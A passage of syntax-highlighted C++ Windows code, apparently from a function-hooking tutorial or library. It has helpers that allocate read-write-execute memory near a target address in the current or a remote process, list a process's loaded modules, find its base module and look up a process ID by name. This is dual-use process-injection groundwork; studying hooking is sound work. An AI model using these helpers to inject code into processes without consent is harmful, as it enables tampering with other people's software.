<span class="kt">void</span><span class="o">*</span> <span class="n">newPage</span> <span class="o">=</span> <span class="n">VirtualAllocEx</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">PAGE_SIZE</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="k">return</span> <span class="n">newPage</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span><span class="o">*</span> <span class="nf">AllocPage</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">SYSTEM_INFO</span> <span class="n">sysInfo</span><span class="p">;</span>
<span class="n">GetSystemInfo</span><span class="p">(</span><span class="o">&</span><span class="n">sysInfo</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">PAGE_SIZE</span> <span class="o">=</span> <span class="n">sysInfo</span><span class="p">.</span><span class="n">dwPageSize</span><span class="p">;</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">newPage</span> <span class="o">=</span> <span class="n">VirtualAlloc</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="n">PAGE_SIZE</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="k">return</span> <span class="n">newPage</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span><span class="o">*</span> <span class="nf">AllocatePageNearAddressRemote</span><span class="p">(</span><span class="n">HANDLE</span> <span class="n">handle</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">targetAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">check</span><span class="p">(</span><span class="n">IsProcess64Bit</span><span class="p">(</span><span class="n">handle</span><span class="p">));</span>
<span class="n">SYSTEM_INFO</span> <span class="n">sysInfo</span><span class="p">;</span>
<span class="n">GetSystemInfo</span><span class="p">(</span><span class="o">&</span><span class="n">sysInfo</span><span class="p">);</span>
<span class="k">const</span> <span class="kt">uint64_t</span> <span class="n">PAGE_SIZE</span> <span class="o">=</span> <span class="n">sysInfo</span><span class="p">.</span><span class="n">dwPageSize</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">startAddr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">(</span><span class="n">targetAddr</span><span class="p">)</span> <span class="o">&</span> <span class="o">~</span><span class="p">(</span><span class="n">PAGE_SIZE</span> <span class="o">-</span> <span class="mi">1</span><span class="p">));</span> <span class="c1">//round down to nearest page boundary</span>
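<span class="c1">//clamp the search window to +/-2GB of the target and to the valid application address range</span>
<span class="kt">uint64_t</span> <span class="n">minAddr</span> <span class="o">=</span> <span class="p">(</span><span class="n">startAddr</span> <span class="o">></span> <span class="mh">0x7FFFFF00</span><span class="p">)</span> <span class="o">?</span> <span class="n">max</span><span class="p">(</span><span class="n">startAddr</span> <span class="o">-</span> <span class="mh">0x7FFFFF00</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">sysInfo</span><span class="p">.</span><span class="n">lpMinimumApplicationAddress</span><span class="p">)</span> <span class="o">:</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">sysInfo</span><span class="p">.</span><span class="n">lpMinimumApplicationAddress</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">maxAddr</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="n">startAddr</span> <span class="o">+</span> <span class="mh">0x7FFFFF00</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">sysInfo</span><span class="p">.</span><span class="n">lpMaximumApplicationAddress</span><span class="p">);</span>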
<span class="kt">uint64_t</span> <span class="n">startPage</span> <span class="o">=</span> <span class="p">(</span><span class="n">startAddr</span> <span class="o">-</span> <span class="p">(</span><span class="n">startAddr</span> <span class="o">%</span> <span class="n">PAGE_SIZE</span><span class="p">));</span>
<span class="kt">uint64_t</span> <span class="n">pageOffset</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint64_t</span> <span class="n">byteOffset</span> <span class="o">=</span> <span class="n">pageOffset</span> <span class="o">*</span> <span class="n">PAGE_SIZE</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">highAddr</span> <span class="o">=</span> <span class="n">startPage</span> <span class="o">+</span> <span class="n">byteOffset</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">lowAddr</span> <span class="o">=</span> <span class="p">(</span><span class="n">startPage</span> <span class="o">></span> <span class="n">byteOffset</span><span class="p">)</span> <span class="o">?</span> <span class="n">startPage</span> <span class="o">-</span> <span class="n">byteOffset</span> <span class="o">:</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">needsExit</span> <span class="o">=</span> <span class="n">highAddr</span> <span class="o">></span> <span class="n">maxAddr</span> <span class="o">&&</span> <span class="n">lowAddr</span> <span class="o"><</span> <span class="n">minAddr</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">highAddr</span> <span class="o"><</span> <span class="n">maxAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">outAddr</span> <span class="o">=</span> <span class="n">VirtualAllocEx</span><span class="p">(</span><span class="n">handle</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">highAddr</span><span class="p">,</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)</span><span class="n">PAGE_SIZE</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">outAddr</span><span class="p">)</span>
<span class="k">return</span> <span class="n">outAddr</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">lowAddr</span> <span class="o">></span> <span class="n">minAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">outAddr</span> <span class="o">=</span> <span class="n">VirtualAllocEx</span><span class="p">(</span><span class="n">handle</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">lowAddr</span><span class="p">,</span> <span class="p">(</span><span class="kt">size_t</span><span class="p">)</span><span class="n">PAGE_SIZE</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">outAddr</span> <span class="o">!=</span> <span class="nb">nullptr</span><span class="p">)</span>
<span class="k">return</span> <span class="n">outAddr</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">pageOffset</span><span class="o">++</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">needsExit</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span><span class="o">*</span> <span class="nf">AllocatePageNearAddress</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">targetAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">AllocatePageNearAddressRemote</span><span class="p">(</span><span class="n">GetCurrentProcess</span><span class="p">(),</span> <span class="n">targetAddr</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1">//I use subst to alias my development folder to W: </span>
<span class="c1">//this will rebase any virtual drives made by subst to</span>
<span class="c1">//their actual drive equivalent, to prevent conflicts. Likely</span>
<span class="c1">//not important for most people and can be ignored</span>
<span class="kt">void</span> <span class="nf">RebaseVirtualDrivePath</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">path</span><span class="p">,</span> <span class="kt">char</span><span class="o">*</span> <span class="n">outBuff</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">outBuffSize</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">memset</span><span class="p">(</span><span class="n">outBuff</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">outBuffSize</span><span class="p">);</span>
<span class="kt">char</span> <span class="n">driveLetter</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">driveLetter</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="mi">2</span><span class="p">);</span>
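<span class="kt">char</span> <span class="n">deviceDrive</span><span class="p">[</span><span class="mi">512</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span> <span class="c1">//zeroed so a failed QueryDosDevice leaves an empty string</span>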
<span class="n">QueryDosDevice</span><span class="p">(</span><span class="n">driveLetter</span><span class="p">,</span> <span class="n">deviceDrive</span><span class="p">,</span> <span class="mi">512</span><span class="p">);</span>
<span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">virtualDrivePrefix</span> <span class="o">=</span> <span class="s">"</span><span class="se">\\</span><span class="s">??</span><span class="se">\\</span><span class="s">"</span><span class="p">;</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">prefix</span> <span class="o">=</span> <span class="n">strstr</span><span class="p">(</span><span class="n">deviceDrive</span><span class="p">,</span> <span class="n">virtualDrivePrefix</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">prefix</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">size_t</span> <span class="n">replacementLen</span> <span class="o">=</span> <span class="n">strlen</span><span class="p">(</span><span class="n">deviceDrive</span><span class="p">)</span> <span class="o">-</span> <span class="n">strlen</span><span class="p">(</span><span class="n">virtualDrivePrefix</span><span class="p">);</span>
<span class="kt">size_t</span> <span class="n">rebasedPathLen</span> <span class="o">=</span> <span class="n">replacementLen</span> <span class="o">+</span> <span class="n">strlen</span><span class="p">(</span><span class="n">path</span><span class="p">)</span> <span class="o">-</span> <span class="mi">2</span><span class="p">;</span>
<span class="n">check</span><span class="p">(</span><span class="n">rebasedPathLen</span> <span class="o"><</span> <span class="n">outBuffSize</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">outBuff</span><span class="p">,</span> <span class="n">deviceDrive</span> <span class="o">+</span> <span class="n">strlen</span><span class="p">(</span><span class="n">virtualDrivePrefix</span><span class="p">),</span> <span class="n">replacementLen</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">outBuff</span> <span class="o">+</span> <span class="n">replacementLen</span><span class="p">,</span> <span class="o">&</span><span class="n">path</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="n">strlen</span><span class="p">(</span><span class="n">path</span><span class="p">)</span> <span class="o">-</span> <span class="mi">2</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span>
<span class="p">{</span>
<span class="n">check</span><span class="p">(</span><span class="n">strlen</span><span class="p">(</span><span class="n">path</span><span class="p">)</span> <span class="o"><</span> <span class="n">outBuffSize</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">outBuff</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">path</span><span class="p">));</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="c1">//returns the first module called "name" -> only searches for dll name, not whole path</span>
<span class="c1">//ie: somepath/subdir/mydll.dll can be searched for with "mydll.dll"</span>
<span class="n">HMODULE</span> <span class="nf">FindModuleInProcess</span><span class="p">(</span><span class="n">HANDLE</span> <span class="n">process</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">name</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">lowerCaseName</span> <span class="o">=</span> <span class="n">_strdup</span><span class="p">(</span><span class="n">name</span><span class="p">);</span>
<span class="n">_strlwr_s</span><span class="p">(</span><span class="n">lowerCaseName</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">name</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">);</span>
<span class="n">HMODULE</span> <span class="n">remoteProcessModules</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="n">DWORD</span> <span class="n">numBytesWrittenInModuleArray</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">BOOL</span> <span class="n">success</span> <span class="o">=</span> <span class="n">EnumProcessModules</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">remoteProcessModules</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">HMODULE</span><span class="p">)</span> <span class="o">*</span> <span class="mi">1024</span><span class="p">,</span> <span class="o">&</span><span class="n">numBytesWrittenInModuleArray</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">success</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Error enumerating modules on target process. Error Code %lu </span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">GetLastError</span><span class="p">());</span>
<span class="n">DebugBreak</span><span class="p">();</span>
<span class="p">}</span>
<span class="n">DWORD</span> <span class="n">numRemoteModules</span> <span class="o">=</span> <span class="n">numBytesWrittenInModuleArray</span> <span class="o">/</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">HMODULE</span><span class="p">);</span>
<span class="n">CHAR</span> <span class="n">remoteProcessName</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="n">GetModuleFileNameEx</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">remoteProcessName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span> <span class="c1">//a null module handle gets the process name</span>
<span class="n">_strlwr_s</span><span class="p">(</span><span class="n">remoteProcessName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="n">MODULEINFO</span> <span class="n">remoteProcessModuleInfo</span><span class="p">;</span>
<span class="n">HMODULE</span> <span class="n">remoteProcessModule</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">//An HMODULE is just the DLL's base address </span>
<span class="k">for</span> <span class="p">(</span><span class="n">DWORD</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">numRemoteModules</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">CHAR</span> <span class="n">moduleName</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="n">CHAR</span> <span class="n">absoluteModuleName</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="n">CHAR</span> <span class="n">rebasedPath</span><span class="p">[</span><span class="mi">256</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
<span class="n">GetModuleFileNameEx</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">remoteProcessModules</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">moduleName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="n">_strlwr_s</span><span class="p">(</span><span class="n">moduleName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">lastSlash</span> <span class="o">=</span> <span class="n">strrchr</span><span class="p">(</span><span class="n">moduleName</span><span class="p">,</span> <span class="sc">'\\'</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">lastSlash</span><span class="p">)</span> <span class="n">lastSlash</span> <span class="o">=</span> <span class="n">strrchr</span><span class="p">(</span><span class="n">moduleName</span><span class="p">,</span> <span class="sc">'/'</span><span class="p">);</span>
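<span class="kt">char</span><span class="o">*</span> <span class="n">dllName</span> <span class="o">=</span> <span class="n">lastSlash</span> <span class="o">?</span> <span class="n">lastSlash</span> <span class="o">+</span> <span class="mi">1</span> <span class="o">:</span> <span class="n">moduleName</span><span class="p">;</span> <span class="c1">//no separator means the whole string is the file name</span>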
<span class="k">if</span> <span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">dllName</span><span class="p">,</span> <span class="n">lowerCaseName</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">remoteProcessModule</span> <span class="o">=</span> <span class="n">remoteProcessModules</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="n">success</span> <span class="o">=</span> <span class="n">GetModuleInformation</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">remoteProcessModules</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="o">&</span><span class="n">remoteProcessModuleInfo</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">MODULEINFO</span><span class="p">));</span>
<span class="n">check</span><span class="p">(</span><span class="n">success</span><span class="p">);</span>
<span class="n">free</span><span class="p">(</span><span class="n">lowerCaseName</span><span class="p">);</span>
<span class="k">return</span> <span class="n">remoteProcessModule</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//the following string operations are to account for cases where GetModuleFileNameEx</span>
<span class="c1">//returns a relative path rather than an absolute one, or where the path we get to the module</span>
<span class="c1">//is using a virtual drive letter (ie: one created by subst) rather than a real drive</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">err</span> <span class="o">=</span> <span class="n">_fullpath</span><span class="p">(</span><span class="n">absoluteModuleName</span><span class="p">,</span> <span class="n">moduleName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="n">check</span><span class="p">(</span><span class="n">err</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">free</span><span class="p">(</span><span class="n">lowerCaseName</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">PrintModulesForProcess</span><span class="p">(</span><span class="n">HANDLE</span> <span class="n">process</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">HMODULE</span> <span class="n">remoteProcessModules</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="n">DWORD</span> <span class="n">numBytesWrittenInModuleArray</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">BOOL</span> <span class="n">success</span> <span class="o">=</span> <span class="n">EnumProcessModules</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">remoteProcessModules</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">HMODULE</span><span class="p">)</span> <span class="o">*</span> <span class="mi">1024</span><span class="p">,</span> <span class="o">&</span><span class="n">numBytesWrittenInModuleArray</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">success</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Error enumerating modules on target process. Error Code %lu </span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">GetLastError</span><span class="p">());</span>
<span class="n">DebugBreak</span><span class="p">();</span>
<span class="p">}</span>
<span class="n">DWORD</span> <span class="n">numRemoteModules</span> <span class="o">=</span> <span class="n">numBytesWrittenInModuleArray</span> <span class="o">/</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">HMODULE</span><span class="p">);</span>
<span class="n">HMODULE</span> <span class="n">remoteProcessModule</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">//An HMODULE is just the DLL's base address </span>
<span class="k">for</span> <span class="p">(</span><span class="n">DWORD</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">numRemoteModules</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">CHAR</span> <span class="n">moduleName</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="n">CHAR</span> <span class="n">absoluteModuleName</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="n">GetModuleFileNameEx</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">remoteProcessModules</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">moduleName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="c1">//the following string operations are to account for cases where GetModuleFileNameEx</span>
<span class="c1">//returns a relative path rather than an absolute one, or where the path we get to the module</span>
<span class="c1">//is using a virtual drive letter (ie: one created by subst) rather than a real drive</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">err</span> <span class="o">=</span> <span class="n">_fullpath</span><span class="p">(</span><span class="n">absoluteModuleName</span><span class="p">,</span> <span class="n">moduleName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="n">check</span><span class="p">(</span><span class="n">err</span><span class="p">);</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"%s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">absoluteModuleName</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="n">HMODULE</span> <span class="nf">GetBaseModuleForProcess</span><span class="p">(</span><span class="n">HANDLE</span> <span class="n">process</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">HMODULE</span> <span class="n">remoteProcessModules</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="n">DWORD</span> <span class="n">numBytesWrittenInModuleArray</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">BOOL</span> <span class="n">success</span> <span class="o">=</span> <span class="n">EnumProcessModules</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">remoteProcessModules</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">HMODULE</span><span class="p">)</span> <span class="o">*</span> <span class="mi">1024</span><span class="p">,</span> <span class="o">&</span><span class="n">numBytesWrittenInModuleArray</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">success</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Error enumerating modules on target process. Error Code %lu </span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">GetLastError</span><span class="p">());</span>
<span class="n">DebugBreak</span><span class="p">();</span>
<span class="p">}</span>
<span class="n">DWORD</span> <span class="n">numRemoteModules</span> <span class="o">=</span> <span class="n">numBytesWrittenInModuleArray</span> <span class="o">/</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">HMODULE</span><span class="p">);</span>
<span class="n">CHAR</span> <span class="n">remoteProcessName</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="n">GetModuleFileNameEx</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">remoteProcessName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span> <span class="c1">//a null module handle gets the process name</span>
<span class="n">_strlwr_s</span><span class="p">(</span><span class="n">remoteProcessName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="n">MODULEINFO</span> <span class="n">remoteProcessModuleInfo</span><span class="p">;</span>
<span class="n">HMODULE</span> <span class="n">remoteProcessModule</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">//An HMODULE is just the DLL's base address </span>
<span class="k">for</span> <span class="p">(</span><span class="n">DWORD</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">numRemoteModules</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">CHAR</span> <span class="n">moduleName</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="n">CHAR</span> <span class="n">absoluteModuleName</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="n">CHAR</span> <span class="n">rebasedPath</span><span class="p">[</span><span class="mi">256</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
<span class="n">GetModuleFileNameEx</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">remoteProcessModules</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">moduleName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="c1">//the following string operations are to account for cases where GetModuleFileNameEx</span>
<span class="c1">//returns a relative path rather than an absolute one, or where the path we get to the module</span>
<span class="c1">//is using a virtual drive letter (ie: one created by subst) rather than a real drive</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">err</span> <span class="o">=</span> <span class="n">_fullpath</span><span class="p">(</span><span class="n">absoluteModuleName</span><span class="p">,</span> <span class="n">moduleName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="n">check</span><span class="p">(</span><span class="n">err</span><span class="p">);</span>
<span class="n">RebaseVirtualDrivePath</span><span class="p">(</span><span class="n">absoluteModuleName</span><span class="p">,</span> <span class="n">rebasedPath</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="n">_strlwr_s</span><span class="p">(</span><span class="n">rebasedPath</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">remoteProcessName</span><span class="p">,</span> <span class="n">rebasedPath</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">remoteProcessModule</span> <span class="o">=</span> <span class="n">remoteProcessModules</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="n">success</span> <span class="o">=</span> <span class="n">GetModuleInformation</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">remoteProcessModules</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="o">&</span><span class="n">remoteProcessModuleInfo</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">MODULEINFO</span><span class="p">));</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">success</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Error getting module information for remote process module</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="n">DebugBreak</span><span class="p">();</span>
<span class="p">}</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="n">remoteProcessModule</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">DWORD</span> <span class="nf">FindPidByName</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">name</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">HANDLE</span> <span class="n">h</span><span class="p">;</span>
<span class="n">PROCESSENTRY32</span> <span class="n">singleProcess</span><span class="p">;</span>
<span class="n">h</span> <span class="o">=</span> <span class="n">CreateToolhelp32Snapshot</span><span class="p">(</span> <span class="c1">//takes a snapshot of specified processes</span>
<span class="n">TH32CS_SNAPPROCESS</span><span class="p">,</span> <span class="c1">//get all processes</span>
<span class="mi">0</span><span class="p">);</span> <span class="c1">//ignored for SNAPPROCESS</span>
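<span class="n">singleProcess</span><span class="p">.</span><span class="n">dwSize</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">PROCESSENTRY32</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">Process32First</span><span class="p">(</span><span class="n">h</span><span class="p">,</span> <span class="o">&</span><span class="n">singleProcess</span><span class="p">))</span> <span class="c1">//fill in the first entry before comparing names</span>
<span class="p">{</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">h</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">do</span> <span class="p">{</span>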
<span class="k">if</span> <span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">singleProcess</span><span class="p">.</span><span class="n">szExeFile</span><span class="p">,</span> <span class="n">name</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">DWORD</span> <span class="n">pid</span> <span class="o">=</span> <span class="n">singleProcess</span><span class="p">.</span><span class="n">th32ProcessID</span><span class="p">;</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">h</span><span class="p">);</span>
<span class="k">return</span> <span class="n">pid</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span> <span class="k">while</span> <span class="p">(</span><span class="n">Process32Next</span><span class="p">(</span><span class="n">h</span><span class="p">,</span> <span class="o">&</span><span class="n">singleProcess</span><span class="p">));</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">h</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
